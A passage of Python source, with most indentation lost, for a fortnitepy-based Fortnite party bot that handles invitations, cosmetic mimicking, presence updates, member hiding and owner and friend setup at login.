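# Usage sketch (hypothetical route), assuming a Sanic app `app` and a
# LoginManager instance `login_manager`:
#
#     @app.route("/status")
#     @login_manager.login_required
#     def status(request):
#         return sanic.response.json({"ok": True})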
def no_auth_handler(self, func: Callable):
if asyncio.iscoroutinefunction(func) is False:
raise ValueError("Function must be a coroutine")
self.no_auth_handler_ = func
@wraps(func)
def deco(*args: Any, **kwargs: Any):
return func(*args, **kwargs)
return deco
class WebUser:
def __init__(self, sessionId: str) -> None:
self._id = sessionId
@property
def display_name(self) -> str:
return "WebUser"
@property
def id(self) -> str:
return self._id
class WebMessage:
def __init__(self, content: str, sessionId: str, client: fortnitepy.Client) -> None:
self._sessionId = sessionId
self._content = content
self._client = client
self._author = WebUser(self._sessionId)
self._messages = []
@property
def author(self) -> WebUser:
return self._author
@property
def content(self) -> str:
return self._content
@property
def client(self) -> fortnitepy.Client:
return self._client
@property
def result(self) -> list:
return self._messages
def reply(self, content: str) -> None:
self._messages.append(content)
class AllMessage:
def __init__(self,
content: str,
author: Union[fortnitepy.user.UserBase, discord.abc.User, WebUser],
client: fortnitepy.Client,
base: Union[fortnitepy.message.MessageBase, discord.Message, WebMessage]
) -> None:
self._content = content
self._author = author
self._client = client
self._base = base
self._messages = {}
@property
def author(self) -> Union[fortnitepy.user.UserBase, discord.abc.User, WebUser]:
return self._author
@property
def content(self) -> str:
return self._content
@property
def client(self) -> fortnitepy.Client:
return self._client
@property
def base(self) -> Union[fortnitepy.message.MessageBase, discord.Message, WebMessage]:
return self._base
@property
def result(self) -> dict:
return self._messages
def reply(self, content: str, client: fortnitepy.Client) -> None:
if not self._messages.get(client.user.id):
self._messages[client.user.id] = []
self._messages[client.user.id].append(content)
class CanBeMultiple:
pass
class Client(fortnitepy.Client):
def __init__(self, emote: str, **kwargs: Any) -> None:
self.email = email
self.status_ = data['fortnite']['status']
self.eid = emote
self.boot_time = None
self.booted_utc = None
self.isready = False
self.booting = False
self.timer = None
self.acceptinvite_interval = True
self.stopcheck = False
self.outfitlock = False
self.backpacklock = False
self.pickaxelock = False
self.emotelock = False
self.owner = []
self.prevmessage = {}
self.select = {}
self.visual_members = []
self.invitelist = []
self.whisper = data['fortnite']['whisper']
self.partychat = data['fortnite']['partychat']
self.discord = data['discord']['discord']
self.web = data['web']['web']
self.whisperperfect = data['fortnite']['disablewhisperperfectly']
self.partychatperfect = data['fortnite']['disablepartychatperfectly']
self.discordperfect = data['discord']['disablediscordperfectly']
self.joinmessageenable = data['fortnite']['joinmessageenable']
self.randommessageenable = data['fortnite']['randommessageenable']
self.outfitmimic = data['fortnite']['outfitmimic']
self.backpackmimic = data['fortnite']['backpackmimic']
self.pickaxemimic = data['fortnite']['pickaxemimic']
self.emotemimic = data['fortnite']['emotemimic']
self.outfitlock = data['fortnite']['outfitlock']
self.backpacklock = data['fortnite']['backpacklock']
self.pickaxelock = data['fortnite']['pickaxelock']
self.emotelock = data['fortnite']['emotelock']
self.acceptinvite = data['fortnite']['acceptinvite']
self.acceptfriend = data['fortnite']['acceptfriend']
super().__init__(**kwargs)
def get_cache_user(self, user: str) -> Optional[fortnitepy.User]:
if self.is_id(user):
users = {i.id: i for i in cache_users.values()}
else:
users = cache_users
return users.get(user)
def add_cache(self, user: fortnitepy.user.UserBase) -> None:
try:
if isinstance(user, fortnitepy.user.UserBase) and user.id:
if isinstance(user, fortnitepy.User):
if user.display_name:
cache_users[user.display_name] = user
else:
user = self.get_user(user.id)
if user and user.display_name:
cache_users[user.display_name] = user
except Exception:
send(l('bot'),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
def inviteaccept(self) -> None:
send(name(self.user),l("inviteaccept"),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
self.acceptinvite = True
def inviteinterval(self) -> None:
send(name(self.user),l("inviteinterval"),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
self.acceptinvite_interval = True
def lock_check(self, author_id: str) -> bool:
if author_id in [client.user.id for client in loadedclients]:
return False
elif author_id in [owner.id for owner in self.owner]:
return False
elif data['fortnite']['whitelist-ignorelock'] and author_id in whitelist:
return False
elif author_id in [owner.id for owner in dclient.owner]:
return False
elif data['discord']['whitelist-ignorelock'] and author_id in whitelist_:
return False
return True
def is_most(self) -> None:
name = self.user.display_name
member_joined_at_most = [self.user.id, getattr(getattr(self.party,"me",None),"joined_at",datetime.datetime.now())]
for member_ in self.party.members:
self.add_cache(member_)
if member_.id in [i.user.id for i in loadedclients]:
if member_.id != self.user.id:
name += f"/{str(member_.display_name)}"
if member_.joined_at < member_joined_at_most[1]:
member_joined_at_most = [member_.id, getattr(member_, "joined_at", datetime.datetime.now())]
if self.user.id == member_joined_at_most[0]:
return name
return None
def get_client_data(self) -> defaultdict:
var = defaultdict(lambda: None)
if not self.isready:
return var
party = getattr(self,"party",None)
if party:
config = party.config
var.update(
{
"party_id": party.id,
"party_size": party.member_count,
"party_max_size": config["max_size"]
}
)
var.update(
{
"friend_count": len(self.friends),
"pending_count": len(self.pending_friends),
"incoming_pending_count": len(self.incoming_pending_friends),
"outgoing_pending_count": len(self.outgoing_pending_friends),
"block_count": len(self.blocked_users),
"display_name": self.user.display_name,
"id": self.user.id,
"boot_time": int(time.time() - self.boot_time),
"client": self,
"whitelist": whitelist,
"whitelist_": whitelist_,
"blacklist": blacklist,
"blacklist_": blacklist_
}
)
return var
async def change_status(self) -> None:
var = defaultdict(lambda: None)
var.update(self.get_client_data())
var.update(
{
"get_client_data": get_client_data,
"all_friend_count": sum([len(client_.friends) for client_ in clients]),
"all_pending_count": sum([len(client_.pending_friends) for client_ in clients]),
"all_incoming_pending_count": sum([len(client_.incoming_pending_friends) for client_ in clients]),
"all_outgoing_pending_count": sum([len(client_.outgoing_pending_friends) for client_ in clients]),
"all_block_count": sum([len(client_.blocked_users) for client_ in clients])
}
)
if data['discord']['enabled'] and dclient.isready:
var.update(
{
"guild_count": len(dclient.guilds),
"get_guild_member_count": get_guild_member_count,
"dclient": dclient
}
)
party = getattr(self,"party",None)
if party:
status = eval_format(self.status_,var)
self.status = status
status = self.party.construct_presence(status)
try:
await self.send_presence(status)
except Exception:
if data['loglevel'] == 'debug':
send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
else:
status = eval_format(self.status_,var)
self.status = status
try:
await self.send_presence(status)
except Exception:
if data['loglevel'] == 'debug':
send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def status_loop(self) -> None:
while True:
try:
await self.change_status()
except Exception:
send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await asyncio.sleep(30)
async def invitation_accept(self, invitation: fortnitepy.ReceivedPartyInvitation) -> None:
try:
await invitation.accept()
except fortnitepy.PartyError:
if data['ingame-error']:
await invitation.sender.send(l("error_already_member_of_party"))
if data['loglevel'] == 'debug':
send(name(self.user),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(name(self.user),l("already_member_of_party"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
# catch NotFound before the broader HTTPException handler below,
# which otherwise made this second handler unreachable
except fortnitepy.NotFound:
if data['ingame-error']:
await invitation.sender.send(l("user_notfound"))
if data['loglevel'] == 'debug':
send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(self.user.display_name,l("user_notfound"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except fortnitepy.Forbidden:
if data['ingame-error']:
await invitation.sender.send(l("error_private_party"))
if data['loglevel'] == 'debug':
send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(self.user.display_name,l("error_private_party"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except fortnitepy.HTTPException:
if data['ingame-error']:
await invitation.sender.send(l("error_while_accepting_partyinvite"))
if data['loglevel'] == 'debug':
send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(self.user.display_name,l("error_while_accepting_partyinvite"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
self.acceptinvite_interval = False
except Exception:
if data['ingame-error']:
await invitation.sender.send(l("error"))
send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if data['fortnite']['inviteinterval']:
try:
self.timer.cancel()
except Exception:
pass
self.acceptinvite_interval = False
self.timer = Timer(data['fortnite']['interval'], self.inviteinterval)
self.timer.start()
if data['loglevel'] == 'normal':
send(name(self.user),l("accepted_invite_from", name(invitation.sender)),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
else:
send(name(self.user),f'{l("accepted_invite_from2", f"{name(invitation.sender)} [{platform_to_str(invitation.sender.platform)}]", invitation.party.id)}',add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
async def invitation_decline(self, invitation: fortnitepy.ReceivedPartyInvitation) -> None:
if data['loglevel'] == 'normal':
send(self.user.display_name,l("declined_invite_from", str(invitation.sender.display_name)),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
else:
send(self.user.display_name,l("declined_invite_from2", f"{str(invitation.sender.display_name)} / {invitation.sender.id} [{platform_to_str(invitation.sender.platform)}]", invitation.party.id),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
try:
await invitation.decline()
except fortnitepy.PartyError:
if data['ingame-error']:
await invitation.sender.send(l("error_netcl_does_not_match"))
if data['loglevel'] == 'debug':
send(client.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(client.user.display_name,l("error_netcl_does_not_match"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except fortnitepy.HTTPException:
if data['ingame-error']:
await invitation.sender.send(l("error_while_declining_invite"))
if data['loglevel'] == 'debug':
                send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
            send(self.user.display_name,l("error_while_declining_invite"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
if data['ingame-error']:
await invitation.sender.send(l("error"))
            send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def invitation_decline_interval(self, invitation: fortnitepy.ReceivedPartyInvitation) -> None:
await invitation.sender.send(l("declined_invite_interval3", str(data["fortnite"]["interval"])))
if data['loglevel'] == 'normal':
send(self.user.display_name,l("declined_invite_interval", str(invitation.sender.display_name), str(data["fortnite"]["interval"])),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
else:
send(self.user.display_name,l("declined_invite_interval2", f"{str(invitation.sender.display_name)} / {invitation.sender.id} [{platform_to_str(invitation.sender.platform)}]", invitation.party.id, str(data["fortnite"]["interval"])),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
try:
await invitation.decline()
except fortnitepy.PartyError:
if data['ingame-error']:
await invitation.sender.send(l("error_netcl_does_not_match"))
if data['loglevel'] == 'debug':
                send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
            send(self.user.display_name,l("error_netcl_does_not_match"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except fortnitepy.HTTPException:
if data['ingame-error']:
await invitation.sender.send(l("error_while_declining_invite"))
if data['loglevel'] == 'debug':
                send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
            send(self.user.display_name,l("error_while_declining_invite"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
if data['ingame-error']:
await invitation.sender.send(l("error"))
            send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def invitation_decline_owner(self, invitation: fortnitepy.ReceivedPartyInvitation) -> None:
await invitation.sender.send(l("declined_invite_owner3"))
if data['loglevel'] == 'normal':
send(self.user.display_name,l("declined_invite_owner", str(invitation.sender.display_name)),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
else:
send(self.user.display_name,l("declined_invite_owner2", f"{str(invitation.sender.display_name)} / {invitation.sender.id} [{platform_to_str(invitation.sender.platform)}]", invitation.party.id),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
try:
await invitation.decline()
except fortnitepy.PartyError:
if data['ingame-error']:
await invitation.sender.send(l("error_netcl_does_not_match"))
if data['loglevel'] == 'debug':
                send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
            send(self.user.display_name,l("error_netcl_does_not_match"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except fortnitepy.HTTPException:
if data['ingame-error']:
await invitation.sender.send(l("error_while_declining_invite"))
if data['loglevel'] == 'debug':
                send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
            send(self.user.display_name,l("error_while_declining_invite"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
if data['ingame-error']:
await invitation.sender.send(l("error"))
            send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def invitation_decline_whitelist(self, invitation: fortnitepy.ReceivedPartyInvitation) -> None:
await invitation.sender.send(l("declined_invite_whitelist3"))
if data['loglevel'] == 'normal':
send(self.user.display_name,l("declined_invite_whitelist", str(invitation.sender.display_name)),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
else:
send(self.user.display_name,l("declined_invite_whitelist2", f"{str(invitation.sender.display_name)} / {invitation.sender.id} [{platform_to_str(invitation.sender.platform)}]", invitation.party.id),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
try:
await invitation.decline()
except fortnitepy.PartyError:
if data['ingame-error']:
await invitation.sender.send(l("error_netcl_does_not_match"))
if data['loglevel'] == 'debug':
                send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
            send(self.user.display_name,l("error_netcl_does_not_match"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except fortnitepy.HTTPException:
if data['ingame-error']:
await invitation.sender.send(l("error_while_declining_invite"))
if data['loglevel'] == 'debug':
                send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
            send(self.user.display_name,l("error_while_declining_invite"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
if data['ingame-error']:
await invitation.sender.send(l("error"))
            send(self.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def change_asset(self, author_id: str, type_: str, id_: str, variants: Optional[list] = None, enlightenment: Optional[Union[tuple, list]] = None) -> None:
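        # Cosmetic dispatcher: routes type_ ("Outfit", "Back Bling", "Pet",
        # "Harvesting Tool", "Emote", "Emoticon", "Toy") to the matching
        # fortnitepy party-member setter. Returns False when the relevant lock
        # blocks author_id, True otherwise. Ids containing 'banner' get the
        # ProfileBanner variant merged in so banner-driven styles render.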
if not enlightenment:
enlightenment = None
if type_ == "Outfit":
if self.outfitlock and self.lock_check(author_id):
return False
else:
if 'banner' in id_:
variants_ = self.party.me.create_variants(item="AthenaCharacter", profile_banner='ProfileBanner')
variants = variants_ + (variants or [])
await self.party.me.edit_and_keep(partial(self.party.me.set_outfit, asset=id_, variants=variants, enlightenment=enlightenment))
try:
if data['fortnite']['avatar_id'] == "{bot}":
self.set_avatar(fortnitepy.Avatar(asset=self.party.me.outfit, background_colors=data['fortnite']['avatar_color']))
except Exception:
if data['loglevel'] == 'debug':
send(name(self.user),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
elif type_ == "Back Bling":
if self.backpacklock and self.lock_check(author_id):
return False
else:
if 'banner' in id_:
variants_ = self.party.me.create_variants(item="AthenaBackpack", profile_banner='ProfileBanner')
                    variants = variants_ + (variants or [])
await self.party.me.edit_and_keep(partial(self.party.me.set_backpack, asset=id_, variants=variants, enlightenment=enlightenment))
elif type_ == "Pet":
if self.backpacklock and self.lock_check(author_id):
return False
else:
if 'banner' in id_:
variants_ = self.party.me.create_variants(item="AthenaBackpack", profile_banner='ProfileBanner')
                    variants = variants_ + (variants or [])
await self.party.me.edit_and_keep(partial(self.party.me.set_pet, asset=id_, variants=variants))
elif type_ == "Harvesting Tool":
if self.pickaxelock and self.lock_check(author_id):
return False
else:
if 'banner' in id_:
variants_ = self.party.me.create_variants(item="AthenaPickaxe", profile_banner='ProfileBanner')
                    variants = variants_ + (variants or [])
await self.party.me.edit_and_keep(partial(self.party.me.set_pickaxe, asset=id_, variants=variants))
await self.party.me.set_emote("EID_IceKing")
elif type_ == "Emote":
if self.emotelock and self.lock_check(author_id):
return False
else:
if member_asset(self.party.me, "emote") and member_asset(self.party.me, "emote").lower() == id_.lower():
await self.party.me.clear_emote()
if "holidaycracker" in id_.lower():
if id_ != '' and '.' not in id_:
id_ = ("AthenaDanceItemDefinition'/Game/Athena/Items/"
"Cosmetics/Dances/HolidayCracker/{0}.{0}'".format(id_))
await self.party.me.set_emote(asset=id_)
self.eid = id_
elif id_.lower().endswith("papayacomms"):
if id_ != '' and '.' not in id_:
id_ = ("AthenaDanceItemDefinition'/Game/Athena/Items/"
"Cosmetics/Dances/PapayaComms/{0}.{0}'".format(id_))
await self.party.me.set_emote(asset=id_)
self.eid = id_
else:
await self.party.me.set_emote(asset=id_)
self.eid = id_
elif type_ == "Emoticon":
if self.emotelock and self.lock_check(author_id):
return False
else:
if member_asset(self.party.me, "emote") and member_asset(self.party.me, "emote").lower() == id_.lower():
await self.party.me.clear_emote()
id_ = f"/Game/Athena/Items/Cosmetics/Dances/Emoji/{id_}.{id_}"
await self.party.me.set_emote(asset=id_)
self.eid = id_
elif type_ == "Toy":
if self.emotelock and self.lock_check(author_id):
return False
else:
if member_asset(self.party.me, "emote") and member_asset(self.party.me, "emote").lower() == id_.lower():
await self.party.me.clear_emote()
id_ = f"/Game/Athena/Items/Cosmetics/Toys/{id_}.{id_}"
await self.party.me.set_emote(asset=id_)
self.eid = id_
return True
async def disable_voice(self) -> None:
if not self.party.me.leader:
raise fortnitepy.Forbidden("You must be the party leader to perform this action.")
prop = self.party.meta.set_voicechat_implementation('None')
        await self.party.patch(updated=prop)
async def enable_voice(self) -> None:
if not self.party.me.leader:
raise fortnitepy.Forbidden("You must be the party leader to perform this action.")
prop = self.party.meta.set_voicechat_implementation('VivoxVoiceChat')
        await self.party.patch(updated=prop)
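    # hide()/show() fake the party's visible member list: they patch a filtered
    # squad_assignments to the party service, then restore the real assignments
    # in the local meta so this client keeps tracking everyone. Each assignment
    # entry has the shape:
    #     {"memberId": "<account id>", "absoluteMemberIdx": <slot index>}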
async def hide(self, member_id: Optional[str] = None) -> None:
if not self.party.me.leader:
raise fortnitepy.Forbidden("You must be the party leader to perform this action.")
real_members = self.party.meta.squad_assignments
if not member_id:
num = 0
squad_assignments = [{"memberId": self.user.id, "absoluteMemberIdx": num}]
num += 1
if data['fortnite']['show-owner']:
for owner in self.owner:
if self.party.get_member(owner.id):
squad_assignments.append({"memberId": owner.id, "absoluteMemberIdx": num})
num += 1
if data['fortnite']['show-whitelist']:
for whitelistuser in whitelist:
if self.party.get_member(whitelistuser):
squad_assignments.append({"memberId": whitelistuser, "absoluteMemberIdx": num})
num += 1
if data['fortnite']['show-bot']:
for botuser in (otherbotlist + [i.user.id for i in loadedclients]):
if self.party.get_member(botuser):
squad_assignments.append({"memberId": botuser, "absoluteMemberIdx": num})
num += 1
else:
member = self.party.get_member(member_id)
if not member:
raise fortnitepy.NotFound("This member is not a part of this party.")
squad_assignments = self.visual_members
            squad_assignments = [squad for squad in squad_assignments if squad["memberId"] != member.id]
self.visual_members = squad_assignments
prop = self.party.meta.set_squad_assignments(squad_assignments)
await self.party.patch(updated=prop)
self.party.meta.set_squad_assignments(real_members)
async def show(self, member_id: Optional[str] = None) -> None:
if not self.party.me.leader:
raise fortnitepy.Forbidden("You must be the party leader to perform this action.")
real_members = self.party.meta.squad_assignments
if not member_id:
member_indexes = [member.position for member in self.party.members if isinstance(member.position,int)]
available_indexes = [num for num in range(15) if num not in member_indexes]
num = 0
squad_assignments = []
for member in self.party.members:
if isinstance(member.position,int):
squad_assignments.append(
{
"memberId": member.id,
"absoluteMemberIdx": member.position
}
)
else:
squad_assignments.append(
{
"memberId": member.id,
"absoluteMemberIdx": available_indexes[num]
}
)
num += 1
else:
squad_assignments = self.visual_members
squad_members = [member["memberId"] for member in squad_assignments]
member_indexes = [member["absoluteMemberIdx"] for member in squad_assignments]
available_indexes = [num for num in range(15) if num not in member_indexes]
member = self.party.get_member(member_id)
if not member:
raise fortnitepy.NotFound("This member is not a part of this party.")
if member.id not in squad_members:
squad_assignments.append({"memberId": member.id, "absoluteMemberIdx": available_indexes[0]})
self.visual_members = squad_assignments
prop = self.party.meta.set_squad_assignments(squad_assignments)
await self.party.patch(updated=prop)
self.party.meta.set_squad_assignments(real_members)
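    # The party_member_*_change handlers below implement mimic mode: a bool True
    # mirrors every member, a string mirrors only that account id, and members
    # from the bot lists are skipped when 'mimic-ignorebot' is set.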
async def party_member_outfit_change(self, member: fortnitepy.PartyMember) -> None:
display_name = name(self.user)
if member.id == self.user.id:
return
flag = False
if isinstance(self.outfitmimic,bool) and self.outfitmimic:
if (member.id in (otherbotlist + [i.user.id for i in loadedclients]) and data['fortnite']['mimic-ignorebot']):
return
flag = True
elif isinstance(self.outfitmimic,str) and member.id == self.outfitmimic:
flag = True
display_name_ = self.is_most()
if display_name_ and member_asset(member,"outfit"):
send(display_name_,f"CID: {member_asset(member,'outfit')}")
if flag:
if not member_asset(member,"outfit"):
try:
await self.change_asset(self.user.id, "Outfit", "")
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
else:
try:
await self.change_asset(self.user.id, "Outfit", member_asset(member,"outfit"), member.outfit_variants, member.enlightenments)
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def party_member_backpack_change(self, member: fortnitepy.PartyMember) -> None:
display_name = name(self.user)
if member.id == self.user.id:
return
flag = False
if isinstance(self.backpackmimic,bool) and self.backpackmimic:
if (member.id in (otherbotlist + [i.user.id for i in loadedclients]) and data['fortnite']['mimic-ignorebot']):
return
flag = True
elif isinstance(self.backpackmimic,str) and member.id == self.backpackmimic:
flag = True
display_name_ = self.is_most()
if display_name_ and member_asset(member,"backpack"):
send(display_name_,f"BID: {member_asset(member,'backpack')}")
if flag:
if not member_asset(member,"backpack"):
try:
await self.change_asset(self.user.id, "Back Bling", "")
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
else:
try:
type_ = convert_to_type(member_asset(member,'backpack'))
await self.change_asset(self.user.id, type_, member_asset(member,"backpack"), member.backpack_variants, member.enlightenments)
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def party_member_pickaxe_change(self, member: fortnitepy.PartyMember) -> None:
display_name = name(self.user)
if member.id == self.user.id:
return
flag = False
if isinstance(self.pickaxemimic,bool) and self.pickaxemimic:
if (member.id in (otherbotlist + [i.user.id for i in loadedclients]) and data['fortnite']['mimic-ignorebot']):
return
flag = True
elif isinstance(self.pickaxemimic,str) and member.id == self.pickaxemimic:
flag = True
display_name_ = self.is_most()
if display_name_ and member_asset(member,"pickaxe"):
send(display_name_,f"Pickaxe_ID: {member_asset(member,'pickaxe')}")
if flag:
if not member_asset(member,"pickaxe"):
try:
await self.change_asset(self.user.id, "Harvesting Tool", "")
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
else:
try:
await self.change_asset(self.user.id, "Harvesting Tool", member_asset(member,"pickaxe"), member.pickaxe_variants)
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def party_member_emote_change(self, member: fortnitepy.PartyMember) -> None:
display_name = name(self.user)
if member.id == self.user.id:
return
flag = False
if isinstance(self.emotemimic,bool) and self.emotemimic:
if (member.id in (otherbotlist + [i.user.id for i in loadedclients]) and data['fortnite']['mimic-ignorebot']):
return
flag = True
elif isinstance(self.emotemimic,str) and member.id == self.emotemimic:
flag = True
display_name_ = self.is_most()
if display_name_ and member_asset(member,"emote"):
send(display_name_,f"EID: {member_asset(member,'emote')}")
if flag:
if not member_asset(member,"emote"):
try:
await self.change_asset(self.user.id, "Emote", "")
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
else:
try:
type_ = convert_to_type(member_asset(member,"emote"))
await self.change_asset(self.user.id, type_, member_asset(member,"emote"))
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
#Events
async def event_device_auth_generate(self, details: dict, email: str) -> None:
store_device_auth_details(email, details)
async def event_ready(self) -> None:
global first_boot
loop = asyncio.get_event_loop()
self.boot_time = time.time()
self.booted_utc = datetime.datetime.utcnow()
display_name = name(self.user)
send(display_name,f'{l("login")}: {display_name}',green,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
flag = False
if first_boot:
first_boot = False
flag = True
self.isready = True
self.booting = False
if not self.visual_members:
if self.party:
self.visual_members = self.party.meta.squad_assignments
else:
self.visual_members = [{"memberId": self.user.id, "absoluteMemberIdx": 0}]
loadedclients.append(self)
client_name[self.user.display_name] = self
self.add_cache(self.user)
        for user in (list(self.friends) + list(self.pending_friends) + list(self.blocked_users)):
self.add_cache(user)
loop.create_task(self.status_loop())
try:
if data['fortnite']['avatar_id'] == "{bot}":
self.set_avatar(fortnitepy.Avatar(asset=self.party.me.outfit, background_colors=data['fortnite']['avatar_color']))
else:
self.set_avatar(fortnitepy.Avatar(asset=data['fortnite']['avatar_id'].format(bot=self.party.me.outfit), background_colors=data['fortnite']['avatar_color']))
except Exception:
if data['loglevel'] == 'debug':
send(name(self.user),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
self.owner = []
for owner in data['fortnite']['owner']:
user = self.get_user(owner) or self.get_cache_user(owner)
if not user:
try:
user = await self.fetch_user(owner)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_requesting_userinfo"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if not user:
send(display_name,l("owner_notfound",owner),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
else:
self.add_cache(user)
friend = self.get_friend(user.id)
if not friend:
send(display_name,l("not_friend_with_owner",commands["reload"]),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
if data['fortnite']['addfriend'] and not self.is_pending(user.id):
try:
await self.add_friend(user.id)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_sending_friendrequest"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
else:
self.owner.append(friend)
send(display_name,f'{l("owner")}: {name(friend)}',green,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
if self.owner and data['fortnite']['click_invite']:
for owner in self.owner:
await owner.send(l("click_invite"))
async def _(listuser: str) -> None:
user = self.get_user(listuser) or self.get_cache_user(listuser)
if not user:
try:
user = await self.fetch_user(listuser)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_requesting_userinfo"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
if not user:
send(display_name,l("invitelist_user_notfound",listuser),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
else:
self.add_cache(user)
friend = self.get_friend(user.id)
if not friend:
send(display_name,l("not_friend_with_inviteuser",listuser,commands["reload"]),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
if data['fortnite']['addfriend'] and not self.is_pending(user.id) and user.id != self.user.id:
try:
await self.add_friend(user.id)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_sending_friendrequest"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
else:
self.invitelist.append(friend.id)
try:
await asyncio.gather(*[_(listuser) for listuser in data['fortnite']['invitelist']])
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if data['loglevel'] == "debug":
send(display_name,f'invitelist {self.invitelist}',yellow,add_d=lambda x:f'```\n{x}\n```')
if data['fortnite']['acceptfriend']:
async def _(pending: fortnitepy.IncomingPendingFriend) -> None:
if self.acceptfriend is True:
try:
await pending.accept()
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
try:
